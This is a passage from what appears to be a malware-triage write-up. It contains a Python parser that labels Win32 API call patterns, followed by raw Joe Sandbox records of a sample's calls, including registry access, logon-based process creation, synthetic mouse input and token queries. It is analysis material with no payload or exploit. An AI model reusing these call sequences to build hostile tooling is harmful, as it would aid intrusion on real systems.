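# optional parenthesised argument list, then "ref: <address>".
LINE_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_RE = re.compile(r"^-?[0-9A-Fa-f]{1,8}$")

Arg = Union[int, str, None]          # hex value, string constant, or unresolved "?"

@dataclass
class Call:
    api: str
    module: str
    args: List[Arg]
    ref: int
    subcall: bool = False

def parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None                   # the plugin could not resolve this value
    if HEX_RE.match(tok):
        return int(tok, 16)
    return tok                        # string constant such as a DLL or export name

def parse_apis(text: str) -> List[Call]:
    """Parse every API line in a record; non-API lines (headers, hashes) are skipped."""
    calls: List[Call] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [parse_arg(t) for t in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("module"), args,
                          int(m.group("ref"), 16), m.group("sub") is not None))
    return calls

# Constant tables for the arguments that matter in these records (Win32 values).
WINDOW_MESSAGES = {0x0030: "WM_SETFONT", 0x00F0: "BM_GETCHECK", 0x00F1: "BM_SETCHECK",
                   0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0111: "WM_COMMAND"}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
LOAD_LIBRARY_FLAGS = {0x0800: "LOAD_LIBRARY_SEARCH_SYSTEM32"}
SOCKET_ARGS = [{2: "AF_INET"}, {1: "SOCK_STREAM"}, {6: "IPPROTO_TCP"}]
IOCTLS = {0x8004667E: "FIONBIO"}

def vk_name(code: int) -> str:
    return VIRTUAL_KEYS.get(code, f"VK_{code:02X}")

def decode(call: Call) -> List[str]:
    """Return symbolic names for the numeric constants in one call."""
    a, names = call.args, []
    if call.api in ("PostMessageW", "SendMessageW") and len(a) >= 2 and isinstance(a[1], int):
        msg = WINDOW_MESSAGES.get(a[1])
        if msg:
            names.append(msg)
        if msg in ("WM_KEYDOWN", "WM_KEYUP") and len(a) >= 3 and isinstance(a[2], int):
            names.append(vk_name(a[2]))
    elif call.api == "socket":
        names.extend(t[a[i]] for i, t in enumerate(SOCKET_ARGS) if i < len(a) and a[i] in t)
    elif call.api == "ioctlsocket" and len(a) >= 2 and a[1] in IOCTLS:
        names.append(IOCTLS[a[1]])
    elif call.api == "LoadLibraryExW" and len(a) >= 3 and isinstance(a[2], int):
        names.extend(n for bit, n in LOAD_LIBRARY_FLAGS.items() if a[2] & bit)
    return names

def find_patterns(calls: List[Call]) -> List[str]:
    """Name the call sequences a triage analyst would recognise in a record."""
    apis = {c.api for c in calls if not c.subcall}
    found: List[str] = []
    key_msgs = [c for c in calls if c.api == "PostMessageW"
                and len(c.args) >= 3 and c.args[1] in (0x100, 0x101)]
    if {"GetKeyboardState", "SetKeyboardState"} <= apis and key_msgs:
        keys = sorted({vk_name(c.args[2]) for c in key_msgs if isinstance(c.args[2], int)})
        found.append("synthetic modifier keystrokes via PostMessage: " + ", ".join(keys))
    if {"socket", "connect"} <= apis and any(
            c.api == "ioctlsocket" and len(c.args) >= 2 and c.args[1] == 0x8004667E for c in calls):
        found.append("non-blocking TCP connect (ioctlsocket FIONBIO, then connect)")
    for c in calls:
        if c.api == "LoadLibraryExW" and len(c.args) >= 3 and isinstance(c.args[2], int) and c.args[2] & 0x800:
            found.append(f"system32-only load of {c.args[0]} (LOAD_LIBRARY_SEARCH_SYSTEM32)")
    return found

if __name__ == "__main__":
    parsed = parse_apis(SAMPLE_APIS)
    for c in parsed:
        print(f"{c.ref:08X} {c.api}.{c.module} {decode(c)}")
    for p in find_patterns(parsed):
        print("pattern:", p)
```

The parser accepts the two argument forms that occur on the page (a parenthesised list, or none at all as in `DrawMenuBar.USER32 ref: ...`) and keeps subcall lines so that `inet_addr` is visible without being counted toward the calling function's own pattern. Extending it is a matter of adding entries to the constant tables; values that are not in a table are left as raw hex rather than guessed.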
                              APIs
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008DE0FA
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008DE120
                              • SysAllocString.OLEAUT32(00000000), ref: 008DE123
                              • SysAllocString.OLEAUT32 ref: 008DE144
                              • SysFreeString.OLEAUT32 ref: 008DE14D
                              • StringFromGUID2.OLE32(?,?,00000028), ref: 008DE167
                              • SysAllocString.OLEAUT32(?), ref: 008DE175
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                              • String ID:
                              • API String ID: 3761583154-0
                              • Opcode ID: be3ed19bf1e4bb24ae9bbace3dd10e0898e52ff5491c445993c597f65d45bd8f
                              • Instruction ID: 90481273abc441c6c4ffb37967d3f236cf85a6686e392539c29b27c6a0705b79
                              • Opcode Fuzzy Hash: be3ed19bf1e4bb24ae9bbace3dd10e0898e52ff5491c445993c597f65d45bd8f
                              • Instruction Fuzzy Hash: 17213235604208AFDF20AFA8DC88DAB77ADFB09760B108226F955CB660DA70DD419B64
                              APIs
                                • Part of subcall function 00881D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00881D73
                                • Part of subcall function 00881D35: GetStockObject.GDI32(00000011), ref: 00881D87
                                • Part of subcall function 00881D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00881D91
                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009078A1
                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009078AE
                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009078B9
                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009078C8
                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009078D4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$CreateObjectStockWindow
                              • String ID: Msctls_Progress32
                              • API String ID: 1025951953-3636473452
                              • Opcode ID: 45674916aad674e9c7d9f28f8b4e6e70a5869568097598799963cc256563d477
                              • Instruction ID: 1a1ce6ffeb272801590325e0c94039995a3b99d78ca89a4f70da820b9f26c0bc
                              • Opcode Fuzzy Hash: 45674916aad674e9c7d9f28f8b4e6e70a5869568097598799963cc256563d477
                              • Instruction Fuzzy Hash: F811B6B2514219BFEF159F60CC85EE77F5DEF48768F018114FA04A2090C772AC21DBA0
                              APIs
                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,008A4292,?), ref: 008A41E3
                              • GetProcAddress.KERNEL32(00000000), ref: 008A41EA
                              • EncodePointer.KERNEL32(00000000), ref: 008A41F6
                              • DecodePointer.KERNEL32(00000001,008A4292,?), ref: 008A4213
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                              • String ID: RoInitialize$combase.dll
                              • API String ID: 3489934621-340411864
                              • Opcode ID: 54a7d21f299d0cd1f1d5722199ce3ca291d882c3667d257f2929df40abf8aaaf
                              • Instruction ID: 0bd4d042148d1c881cc35ff4bc2bfe17cbea778dce8db2905e4fb8bdc406cde5
                              • Opcode Fuzzy Hash: 54a7d21f299d0cd1f1d5722199ce3ca291d882c3667d257f2929df40abf8aaaf
                              • Instruction Fuzzy Hash: 5BE0E5B86B8744AEEB206BB0EC19F443AA4B7AAB46F109424B421E54E0DBB555D5AA00
                              APIs
                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008A41B8), ref: 008A42B8
                              • GetProcAddress.KERNEL32(00000000), ref: 008A42BF
                              • EncodePointer.KERNEL32(00000000), ref: 008A42CA
                              • DecodePointer.KERNEL32(008A41B8), ref: 008A42E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                              • String ID: RoUninitialize$combase.dll
                              • API String ID: 3489934621-2819208100
                              • Opcode ID: 5cb3b7a6ae022567cb01f1941fdebf0b73e2e3a5f2872093f929d507415d5ae4
                              • Instruction ID: 5d4e5b4c462c316eb0a4b3c1bd4a9b7a97b780d2014156f00b3ecfccf2825a5b
                              • Opcode Fuzzy Hash: 5cb3b7a6ae022567cb01f1941fdebf0b73e2e3a5f2872093f929d507415d5ae4
                              • Instruction Fuzzy Hash: F6E0BF7C66D3019FEB209B60FD1EF443AA4F769B46F205034F011E58A0CBB54694FB14
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memmove$__itow__swprintf
                              • String ID:
                              • API String ID: 3253778849-0
                              • Opcode ID: ab4eb5b95743a44d51d7fadd3155ba3afd48b97ef46ff4ca0970a978f0b83e01
                              • Instruction ID: ebdfd24a58964f9778a096f488cfb7f7840bcfda2c6d43044ff16272c06b1d91
                              • Opcode Fuzzy Hash: ab4eb5b95743a44d51d7fadd3155ba3afd48b97ef46ff4ca0970a978f0b83e01
                              • Instruction Fuzzy Hash: F0618A3050069A9BDF11FF29CC81EFE3BA4FF56348F084519F8959B292EA34AD51CB52
                              APIs
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                • Part of subcall function 009010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00900038,?,?), ref: 009010BC
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00900548
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00900588
                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 009005AB
                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009005D4
                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00900617
                              • RegCloseKey.ADVAPI32(00000000), ref: 00900624
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                              • String ID:
                              • API String ID: 4046560759-0
                              • Opcode ID: ac6f17ceb106fee27ea20b9c2f1ef9eafdfb02e77ea994c5a6f5feab19808d85
                              • Instruction ID: 80c7b07dbfd8611953a514d6712223e020e9f759568859251d274f3c46c6a807
                              • Opcode Fuzzy Hash: ac6f17ceb106fee27ea20b9c2f1ef9eafdfb02e77ea994c5a6f5feab19808d85
                              • Instruction Fuzzy Hash: D7514731208200AFDB14EB28C885E6EBBF9FF89714F04492DF595972A1DB31EA04DB52
                              APIs
                              • GetMenu.USER32(?), ref: 00905A82
                              • GetMenuItemCount.USER32(00000000), ref: 00905AB9
                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00905AE1
                              • GetMenuItemID.USER32(?,?), ref: 00905B50
                              • GetSubMenu.USER32(?,?), ref: 00905B5E
                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00905BAF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Menu$Item$CountMessagePostString
                              • String ID:
                              • API String ID: 650687236-0
                              • Opcode ID: 13c6c4750b3fefdc22937d329490a022a1cc15af3e10213f04124c57dfcb5936
                              • Instruction ID: 45a0a847dc5e9f07852c1efb990a81c48985a08d0f68327c731c62a8e014a19f
                              • Opcode Fuzzy Hash: 13c6c4750b3fefdc22937d329490a022a1cc15af3e10213f04124c57dfcb5936
                              • Instruction Fuzzy Hash: 35515C35A00619AFDB11EFA8C845AAEBBB4FF48310F154469E852E7391CB74AE41CF91
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 008DF3F7
                              • VariantClear.OLEAUT32(00000013), ref: 008DF469
                              • VariantClear.OLEAUT32(00000000), ref: 008DF4C4
                              • _memmove.LIBCMT ref: 008DF4EE
                              • VariantClear.OLEAUT32(?), ref: 008DF53B
                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 008DF569
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Variant$Clear$ChangeInitType_memmove
                              • String ID:
                              • API String ID: 1101466143-0
                              • Opcode ID: 30aa81a10de89e2f08e6c912ce081ccfbfc75c2343b528edde0d8bca05a0d397
                              • Instruction ID: 5cb52ddaecf2cd2d0871b4f9d09d416b2fbe47a04026076ad2b9202ffd251f73
                              • Opcode Fuzzy Hash: 30aa81a10de89e2f08e6c912ce081ccfbfc75c2343b528edde0d8bca05a0d397
                              • Instruction Fuzzy Hash: 84516AB5A00209EFCB10CF58D884AAAB7F9FF4C314B15816AEE59DB311D730E951CBA0
                              APIs
                              • _memset.LIBCMT ref: 008E2747
                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E2792
                              • IsMenu.USER32(00000000), ref: 008E27B2
                              • CreatePopupMenu.USER32 ref: 008E27E6
                              • GetMenuItemCount.USER32(000000FF), ref: 008E2844
                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 008E2875
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                              • String ID:
                              • API String ID: 3311875123-0
                              • Opcode ID: 190ea18e37b38799b7a1a78de091952d225a98776b543ce2c742fe90b2b6a46c
                              • Instruction ID: 50288e62baad466868a0fb0e22420a81b30e72e09fd6856fd2cdf11daafce5ed
                              • Opcode Fuzzy Hash: 190ea18e37b38799b7a1a78de091952d225a98776b543ce2c742fe90b2b6a46c
                              • Instruction Fuzzy Hash: 1151A370900399DFDF24CF6AD888AAEBBF9FF46314F104169E825DB291D7709944CB52
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 0088179A
                              • GetWindowRect.USER32(?,?), ref: 008817FE
                              • ScreenToClient.USER32(?,?), ref: 0088181B
                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0088182C
                              • EndPaint.USER32(?,?), ref: 00881876
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                              • String ID:
                              • API String ID: 1827037458-0
                              • Opcode ID: d6b582e56d984c25108643019ffabbbb4bc07c4281f51958f1f036d6aed4d705
                              • Instruction ID: 8d3346a2bc242a433b3314be7a16250a241a8ba592473d41469679f0a9574d1c
                              • Opcode Fuzzy Hash: d6b582e56d984c25108643019ffabbbb4bc07c4281f51958f1f036d6aed4d705
                              • Instruction Fuzzy Hash: E24192705083059FDB20EF24CC89FB67BE8FB4A724F140629F554C72A1CB719946EB62
                              APIs
                              • ShowWindow.USER32(009467B0,00000000,01165BC0,?,?,009467B0,?,0090B862,?,?), ref: 0090B9CC
                              • EnableWindow.USER32(00000000,00000000), ref: 0090B9F0
                              • ShowWindow.USER32(009467B0,00000000,01165BC0,?,?,009467B0,?,0090B862,?,?), ref: 0090BA50
                              • ShowWindow.USER32(00000000,00000004,?,0090B862,?,?), ref: 0090BA62
                              • EnableWindow.USER32(00000000,00000001), ref: 0090BA86
                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0090BAA9
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$Show$Enable$MessageSend
                              • String ID:
                              • API String ID: 642888154-0
                              • Opcode ID: 90ab693c7abe81b2fd9a64eec182ed1a4fd0259cd70e1d50dc61269124c4c525
                              • Instruction ID: 565b1416b449dda97e7e8ad3bca31999bb646f53bf8f6db01da499c645ec543d
                              • Opcode Fuzzy Hash: 90ab693c7abe81b2fd9a64eec182ed1a4fd0259cd70e1d50dc61269124c4c525
                              • Instruction Fuzzy Hash: D0417F31604641EFDB22CF28C499B957BE4FF05324F5842B9FA588F6E2C731A846DB61
                              APIs
                              • GetForegroundWindow.USER32(?,?,?,?,?,?,008F5134,?,?,00000000,00000001), ref: 008F73BF
                                • Part of subcall function 008F3C94: GetWindowRect.USER32(?,?), ref: 008F3CA7
                              • GetDesktopWindow.USER32 ref: 008F73E9
                              • GetWindowRect.USER32(00000000), ref: 008F73F0
                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 008F7422
                                • Part of subcall function 008E54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E555E
                              • GetCursorPos.USER32(?), ref: 008F744E
                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008F74AC
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                              • String ID:
                              • API String ID: 4137160315-0
                              • Opcode ID: 70878cb5852f0eaeb40f62bb09e1493810bbb9537b2fcb98d8e539c8df08e38d
                              • Instruction ID: 2effba4343483ca912074178f4cf5b938a87c5472b501b071bfec36aa33e032c
                              • Opcode Fuzzy Hash: 70878cb5852f0eaeb40f62bb09e1493810bbb9537b2fcb98d8e539c8df08e38d
                              • Instruction Fuzzy Hash: 3731C372508309AFD720DF24D849E6ABBE9FF99314F000919F588D7191CA30EA09CB96
                              APIs
                                • Part of subcall function 008D85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008D8608
                                • Part of subcall function 008D85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008D8612
                                • Part of subcall function 008D85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008D8621
                                • Part of subcall function 008D85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008D8628
                                • Part of subcall function 008D85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008D863E
                              • GetLengthSid.ADVAPI32(?,00000000,008D8977), ref: 008D8DAC
                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008D8DB8
                              • HeapAlloc.KERNEL32(00000000), ref: 008D8DBF
                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 008D8DD8
                              • GetProcessHeap.KERNEL32(00000000,00000000,008D8977), ref: 008D8DEC
                              • HeapFree.KERNEL32(00000000), ref: 008D8DF3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                              • String ID:
                              • API String ID: 3008561057-0
                              • Opcode ID: 076a3f5cebb504edb0c556e483315160af4aca8a8d7e5e28365e342316c9a20d
                              • Instruction ID: 160df05ceaf3ff4484c9e0236cbcf8be39cce4e16c6ea5139ddb76ad194db832
                              • Opcode Fuzzy Hash: 076a3f5cebb504edb0c556e483315160af4aca8a8d7e5e28365e342316c9a20d
                              • Instruction Fuzzy Hash: 1911DC31514604FFDB609FA4CC18BAE7BBAFF54315F10422AE885D3290CB32AA40DB60
                              APIs
                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008D8B2A
                              • OpenProcessToken.ADVAPI32(00000000), ref: 008D8B31
                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 008D8B40
                              • CloseHandle.KERNEL32(00000004), ref: 008D8B4B
                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008D8B7A
                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 008D8B8E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                              • String ID:
                              • API String ID: 1413079979-0
                              • Opcode ID: a2e2168002e94358064b0a4cc9e11b0657de7d59250bdcfa84199a449cd7204d
                              • Instruction ID: c74699a98912e11c1d451ef48ff50fffcb2b7772ee0a69d6780e0329ec36678e
                              • Opcode Fuzzy Hash: a2e2168002e94358064b0a4cc9e11b0657de7d59250bdcfa84199a449cd7204d
